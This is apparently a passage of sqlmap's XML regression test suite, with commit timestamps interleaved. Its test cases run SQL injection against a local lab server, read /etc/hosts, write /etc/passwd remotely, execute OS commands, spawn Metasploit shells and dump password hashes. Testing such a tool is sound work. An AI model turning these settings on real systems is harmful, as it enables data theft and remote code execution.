<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+2, fluffy, bunny.+1, luther, blisset.+3, wu, ming'" />
</parse>
</case>
<case name= "SQLite UNION query multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
2013-01-21 20:41:47 +04:00
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
2013-01-14 16:22:00 +04:00
</parse>
</case>
2013-01-22 15:23:48 +04:00
<case name= "Firebird boolean-based multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users \[.+1, luther, blisset.+2, fluffy, bunny'" />
</parse>
</case>
<case name= "Firebird UNION query multi-threaded custom SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users \[.+1, luther, blisset.+2, fluffy, bunny'" />
</parse>
</case>
<case name= "Firebird boolean-based multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+2, fluffy, bunny.+1, luther, blisset.+3, wu, ming'" />
</parse>
</case>
<case name= "Firebird UNION query multi-threaded custom ordered SQL query enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<query value= "SELECT * FROM users ORDER BY name" />
</switches>
<parse >
<item value= "r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'" />
</parse>
</case>
2012-12-18 20:30:46 +04:00
<!-- End of user's provided statement enumeration switches -->
2012-12-19 20:39:13 +04:00
<!-- File system access switches -->
<case name= "MySQL boolean-based multi-threaded file read" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<rFile value= "/etc/hosts,/tmp/invalidfile" />
</switches>
<parse >
<item value= "r'files saved to.+files/_etc_hosts \(same file\)'" />
</parse>
</case>
<case name= "MySQL error-based multi-threaded file read" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<rFile value= "/etc/hosts,/tmp/invalidfile" />
</switches>
<parse >
<item value= "r'files saved to.+files/_etc_hosts \(same file\)'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded file read" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<rFile value= "/etc/hosts,/tmp/invalidfile" />
</switches>
<parse >
<item value= "r'files saved to.+files/_etc_hosts \(same file\)'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded file write" >
<switches >
2012-12-20 17:18:45 +04:00
<verbose value= "2" />
2012-12-19 20:39:13 +04:00
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<wFile value= "/etc/passwd" />
<dFile value= "/tmp/passwd-${random}" />
</switches>
<parse >
<item value= "the remote file /tmp/passwd-${random} is larger than the local file /etc/passwd" console_output= "True" />
</parse>
</case>
2013-01-14 17:42:50 +04:00
<case name= "PostgreSQL boolean-based multi-threaded file read" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "BS" />
<timeSec value= "2" />
<rFile value= "/etc/hosts,/tmp/invalidfile" />
<answers value= "do you want to overwrite it=Y" />
</switches>
<parse >
<item value= "r'files saved to.+files/_etc_hosts \(same file\)'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded file read" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "ES" />
<rFile value= "/etc/hosts,/tmp/invalidfile" />
<answers value= "do you want to overwrite it=Y" />
</switches>
<parse >
<item value= "r'files saved to.+files/_etc_hosts \(same file\)'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded file read" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "US" />
<rFile value= "/etc/hosts,/tmp/invalidfile" />
<answers value= "do you want to overwrite it=Y" />
</switches>
<parse >
<item value= "r'files saved to.+files/_etc_hosts \(same file\)'" />
</parse>
</case>
<case name= "PostgreSQL multi-threaded file write" >
<switches >
<verbose value= "2" />
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<wFile value= "/etc/passwd" />
<dFile value= "/tmp/passwd-${random}" />
<answers value= "do you want to overwrite it=Y" />
</switches>
<parse >
2013-01-30 14:32:56 +04:00
<item value= "the local file /etc/passwd and the remote file /tmp/passwd-${random} has the same size" console_output= "True" />
2013-01-14 17:42:50 +04:00
</parse>
</case>
2012-12-19 20:39:13 +04:00
<!-- End of file system access switches -->
<!-- Operating system access switches -->
<case name= "MySQL web shell - command execution" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<tech value= "B" />
<osCmd value= "id" />
2013-01-20 05:33:22 +04:00
<answers value= "please provide additional comma separated file paths to=test" />
2012-12-19 20:39:13 +04:00
</switches>
<parse >
<item value= "command standard output: 'uid=" />
</parse>
</case>
<case name= "MySQL shell via Metasploit integration - command execution" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
2013-01-14 17:42:50 +04:00
<tech value= "BU" />
2012-12-19 20:39:13 +04:00
<osPwn value= "True" />
<msfPath value= "/usr/local/bin/" />
2013-01-26 19:51:47 +04:00
<answers value= "please provide additional comma separated file paths to=/var/www/test,do you want to overwrite it=Y,which connection type do you want to use=2" />
2013-01-14 17:42:50 +04:00
</switches>
<parse >
<item value= "r'Sending stage.+Linux.+uid=.+www-data'" console_output= "True" />
</parse>
</case>
2013-01-16 19:36:35 +04:00
<case name= "PostgreSQL User-Defined Function (UDF) injection - command execution (UNION)" >
2013-01-14 17:42:50 +04:00
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<tech value= "US" />
<osCmd value= "id" />
<answers value= "do you want to overwrite it=Y" />
</switches>
<parse >
<item value= "command standard output: 'uid=" />
</parse>
</case>
2013-01-16 19:36:35 +04:00
<case name= "PostgreSQL User-Defined Function (UDF) injection - command execution (boolean)" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<tech value= "BS" />
<osCmd value= "ls -1" />
<answers value= "do you want to overwrite it=Y" />
</switches>
<parse >
<item value= "r'command standard output:.+base.+PG_VERSION.+server.key'" />
</parse>
</case>
2013-01-14 17:42:50 +04:00
<case name= "PostgreSQL shell via Metasploit integration - command execution" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<tech value= "US" />
<osPwn value= "True" />
<msfPath value= "/usr/local/bin/" />
2013-01-26 19:51:47 +04:00
<answers value= "do you want to overwrite it=Y,which connection type do you want to use=2" />
2012-12-19 20:39:13 +04:00
</switches>
<parse >
2013-01-14 17:42:50 +04:00
<item value= "r'Sending stage.+Linux.+uid=.+postgres'" console_output= "True" />
2012-12-19 20:39:13 +04:00
</parse>
</case>
2013-01-22 22:28:59 +04:00
<!-- TODO: add Microsoft SQL Server command execution test cases -->
2012-12-19 20:39:13 +04:00
<!-- End of operating system access switches -->
2013-01-15 14:10:03 +04:00
<!-- Corner cases -->
<case name= "Time-based (heavy query)" >
2012-12-19 22:30:04 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_benchmark.php?id=1" />
<tech value= "T" />
<level value= "2" />
<risk value= "2" />
<timeSec value= "2" />
</switches>
<parse >
2012-12-20 15:05:11 +04:00
<item value= "Type: AND/OR time-based blind" />
2012-12-19 22:30:04 +04:00
<item value= "Title: MySQL < 5.0.12 AND time-based blind (heavy query)" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "OR boolean-based" >
2012-12-20 16:52:26 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<testFilter value= "OR boolean" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: OR boolean-based blind - WHERE or HAVING clause" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-20 16:52:26 +04:00
<item value= "current user is DBA: True" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "Page protected by custom (weak) filter" >
2012-12-19 22:30:04 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_filtered.php?id=1" />
<tech value= "BE" />
<level value= "3" />
</switches>
<parse >
<item value= "Title: Generic boolean-based blind - Parameter replace (original value)" />
<item value= "Title: MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "GROUP BY clause" >
2012-12-19 22:30:04 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_groupby.php?id=1" />
<tech value= "B" />
<level value= "3" />
</switches>
<parse >
2013-01-18 13:32:05 +04:00
<item value= "Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)" />
2012-12-19 22:30:04 +04:00
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "International data" >
2012-12-19 22:30:04 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_international.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<getBanner value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "international" />
</switches>
<parse >
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-05 13:58:11 +04:00
<item value= "r'Database: testdb.+Table: international.+3 entries.+šućuraj.+长江.+река Москва'" />
2012-12-19 22:30:04 +04:00
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "Highly dynamic page" >
2012-12-20 13:42:44 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_rand.php?id=1" />
2012-12-20 15:05:11 +04:00
<timeSec value= "2" />
2012-12-20 13:42:44 +04:00
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" />
<item value= "Title: MySQL UNION query (NULL) - 3 columns" />
<item value= "Title: MySQL > 5.0.11 AND time-based blind" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "302 redirect page when SQL statement return no output" >
2012-12-20 13:42:44 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_redirected.php?id=1" />
2012-12-20 15:05:11 +04:00
<timeSec value= "2" />
2012-12-20 13:42:44 +04:00
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "Title: MySQL UNION query (NULL) - 3 columns" />
<item value= "Title: MySQL > 5.0.11 AND time-based blind" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "Page that returns an image" >
2012-12-20 15:05:11 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_img.php?id=1" />
<tech value= "BT" />
<timeSec value= "2" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "Title: MySQL > 5.0.11 AND time-based blind" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "302 redirect page when SQL statement returns output" >
2012-12-20 13:42:44 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_redirected_true.php?id=1" />
<tech value= "E" />
</switches>
<parse >
<item value= "Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "Invalid bignum" >
2012-12-19 21:28:41 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_partialunion.php?id=1" />
<tech value= "U" />
<invalidBignum value= "True" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: MySQL UNION query (NULL) - 3 columns" />
<item value= "r'Payload: id=[\d]+\.[\d]+ UNION'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-19 21:28:41 +04:00
<item value= "current user is DBA: True" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "Invalid logical" >
2012-12-19 21:28:41 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_partialunion.php?id=1" />
<tech value= "U" />
<invalidLogical value= "True" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: MySQL UNION query (NULL) - 3 columns" />
<item value= "r'Payload: id=1 AND [\d]+=[\d]+ UNION'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-19 21:28:41 +04:00
<item value= "current user is DBA: True" />
</parse>
</case>
2013-01-15 14:10:03 +04:00
<!-- End of corner cases -->
2012-12-19 22:30:04 +04:00
<!-- Other switches -->
2013-01-15 14:10:03 +04:00
<case name= "HTTP basic authentication" >
2012-12-19 21:28:41 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/basic/get_int.php?id=1" />
<tech value= "E" />
<aType value= "Basic" />
<aCred value= "testuser:testpass" />
<getBanner value= "True" />
</switches>
<parse >
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-19 21:28:41 +04:00
</parse>
</case>
2013-01-15 14:10:03 +04:00
<case name= "HTTP digest authentication" >
2012-12-19 21:28:41 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/digest/get_int.php?id=1" />
<tech value= "E" />
<aType value= "Digest" />
<aCred value= "testuser:testpass" />
<getBanner value= "True" />
</switches>
<parse >
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-19 21:28:41 +04:00
</parse>
</case>
2013-02-15 21:11:40 +04:00
<case name= "Boolean-based predict output enumeration" >
2012-12-19 21:28:41 +04:00
<switches >
2012-12-20 17:18:45 +04:00
<verbose value= "2" />
2012-12-19 21:28:41 +04:00
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<predictOutput value= "True" />
<tech value= "B" />
<getBanner value= "True" />
</switches>
<parse >
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-19 21:28:41 +04:00
<item value= "r'performed 112 queries'" console_output= "True" />
</parse>
</case>
2013-02-15 21:11:40 +04:00
<case name= "Time-based predict output enumeration" >
<switches >
<verbose value= "2" />
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<predictOutput value= "True" />
<tech value= "T" />
<getBanner value= "True" />
</switches>
<parse >
<item value= "banner: '5.1.66-0+squeeze1'" />
<item value= "r'performed 126 queries'" console_output= "True" />
</parse>
</case>
2013-01-30 14:40:12 +04:00
<case name= "Hex conversion data retrival" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<hexConvert value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0'" />
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-12 13:28:15 +04:00
<item value= "current user: 'root@%'" />
2013-01-30 14:40:12 +04:00
<item value= "current database: 'testdb'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+'debian-sys-maint'@'localhost'.+'root'@''" />
<item value= "r'database management system users password hashes:.+root \[.+password hash: \*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'" />
<item value= "r'database management system users privileges:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+privilege: SUPER'" />
<item value= "r'database management system users roles:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+role: SUPER'" />
<item value= "r'available databases \[.+information_schema.+mysql.+testdb'" />
<item value= "r'Database: testdb.+3 tables.+users'" />
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table.+Entries.+users.+5'" />
<item value= "r'Database: testdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2013-01-25 19:07:27 +04:00
<case name= "Custom GET parameter injection mark" >
<switches >
<verbose value= "2" />
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1*" />
<tech value= "B" />
<getBanner value= "True" />
</switches>
<parse >
<item value= "banner: '5.1.66-0+squeeze1'" />
</parse>
</case>
<case name= "Custom POST data injection mark" >
<switches >
<verbose value= "2" />
<url value= "http://debiandev/sqlmap/mysql/post_int.php" />
<data value= "id=1*" />
<tech value= "E" />
<getBanner value= "True" />
</switches>
<parse >
<item value= "banner: '5.1.66-0+squeeze1'" />
</parse>
</case>
<case name= "Custom HTTP header (UA) injection mark" >
<switches >
<verbose value= "2" />
<url value= "http://debiandev/sqlmap/mysql/header_str.php" />
<headers value= "User-Agent: 1*" />
<tech value= "U" />
<getBanner value= "True" />
</switches>
<parse >
<item value= "banner: '5.1.66-0+squeeze1'" />
</parse>
</case>
2013-01-22 22:28:59 +04:00
<case name= "Estimated time of arrival" >
<switches >
<verbose value= "2" />
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<tech value= "B" />
<eta value= "True" />
<getBanner value= "True" />
</switches>
<parse >
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-01-30 14:32:56 +04:00
<item value= "r'100\% \[===.+=\] 17\/17'" console_output= "True" />
2013-01-22 22:28:59 +04:00
</parse>
</case>
2013-01-23 04:18:54 +04:00
<case name= "Multiple parameters" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?pAram=value&s=3&id=1&Par=VALUE" />
<tech value= "B" />
<getBanner value= "True" />
<answers value= "Do you want to keep testing the others=Y" />
</switches>
<parse >
<item value= "banner: '5.1.66-0+squeeze1'" />
<item value= "testing for SQL injection on GET parameter 'pAram'" console_output= "True" />
<item value= "testing for SQL injection on GET parameter 's'" console_output= "True" />
<item value= "testing for SQL injection on GET parameter 'id'" console_output= "True" />
<item value= "testing for SQL injection on GET parameter 'Par'" console_output= "True" />
</parse>
</case>
2012-12-19 21:28:41 +04:00
<!-- End of other switches -->
2013-01-23 17:05:10 +04:00
<!-- TODO: add the following test cases:
* Test against a web service with XML POST data
* Test against a web application with generic XML POST data
* Test against a web application with JSON POST data
* Test against a web application with Multipart POST DATA
* Test direct connection against all supported DBMSes
-->
2010-09-15 17:55:28 +04:00
</root>